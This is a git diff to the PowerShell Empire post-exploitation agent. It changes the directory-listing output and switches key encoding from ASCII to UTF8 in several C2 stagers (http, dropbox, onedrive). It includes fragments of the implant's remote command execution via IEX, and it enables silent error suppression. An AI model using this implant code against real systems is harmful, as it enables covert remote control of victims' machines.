diff --git a/data/agent/agent.ps1 b/data/agent/agent.ps1 index eb25b3a..d46afd5 100644 --- a/data/agent/agent.ps1 +++ b/data/agent/agent.ps1 @@ -281,11 +281,11 @@ function Invoke-Empire { switch -regex ($cmd) { '(ls|^dir)' { if ($cmdargs.length -eq "") { - $output = Get-ChildItem -force | select mode,@{Name="Owner";Expression={ (Get-Acl $_.FullName).Owner }},lastwritetime,length,name + $output = Get-ChildItem -force | select mode,lastwritetime,length,name } else { try{ - $output = IEX "$cmd $cmdargs -Force -ErrorAction Stop | select mode,@{Name="Owner";Expression={ (Get-Acl $_.FullName).Owner }},lastwritetime,length,name" + $output = IEX "$cmd $cmdargs -Force -ErrorAction Stop | select lastwritetime,length,name" } catch [System.Management.Automation.ActionPreferenceStopException] { $output = "[!] Error: $_ (or cannot be accessed)." diff --git a/data/agent/stagers/dropbox.ps1 b/data/agent/stagers/dropbox.ps1 index cfc5cfe..28dee07 100644 --- a/data/agent/stagers/dropbox.ps1 +++ b/data/agent/stagers/dropbox.ps1 @@ -52,7 +52,7 @@ function Start-Negotiate { # try to ignore all errors $ErrorActionPreference = "SilentlyContinue"; - $e=[System.Text.Encoding]::ASCII; + $e=[System.Text.Encoding]::UTF8; $SKB=$e.GetBytes($SK); # set up the AES/HMAC crypto diff --git a/data/agent/stagers/http.ps1 b/data/agent/stagers/http.ps1 index 77b3ed3..6abd449 100644 --- a/data/agent/stagers/http.ps1 +++ b/data/agent/stagers/http.ps1 @@ -56,8 +56,8 @@ function Start-Negotiate { $Null = [Reflection.Assembly]::LoadWithPartialName("System.Core"); # try to ignore all errors - #$ErrorActionPreference = "SilentlyContinue"; - $e=[System.Text.Encoding]::ASCII; + $ErrorActionPreference = "SilentlyContinue"; + $e=[System.Text.Encoding]::UTF8; $customHeaders = ""; $SKB=$e.GetBytes($SK); # set up the AES/HMAC crypto diff --git a/data/agent/stagers/http_com.ps1 b/data/agent/stagers/http_com.ps1 index eab45c7..9d9814c 100644 --- a/data/agent/stagers/http_com.ps1 +++ b/data/agent/stagers/http_com.ps1 @@ -57,7 +57,7 @@ function Start-Negotiate { # try to ignore all errors $ErrorActionPreference = "SilentlyContinue"; - $e=[System.Text.Encoding]::ASCII; + $e=[System.Text.Encoding]::UTF8; $customHeaders = ""; $SKB=$e.GetBytes($SK); # set up the AES/HMAC crypto diff --git a/data/agent/stagers/http_mapi.ps1 b/data/agent/stagers/http_mapi.ps1 index d34a9e8..b431b75 100644 Binary files a/data/agent/stagers/http_mapi.ps1 and b/data/agent/stagers/http_mapi.ps1 differ diff --git a/data/agent/stagers/onedrive.ps1 b/data/agent/stagers/onedrive.ps1 index 571fe5a..1e10152 100644 --- a/data/agent/stagers/onedrive.ps1 +++ b/data/agent/stagers/onedrive.ps1 @@ -52,7 +52,7 @@ function Start-Negotiate { # try to ignore all errors $ErrorActionPreference = "SilentlyContinue"; - $e=[System.Text.Encoding]::ASCII; + $e=[System.Text.Encoding]::UTF8; $SKB=$e.GetBytes($SK); # set up the AES/HMAC crypto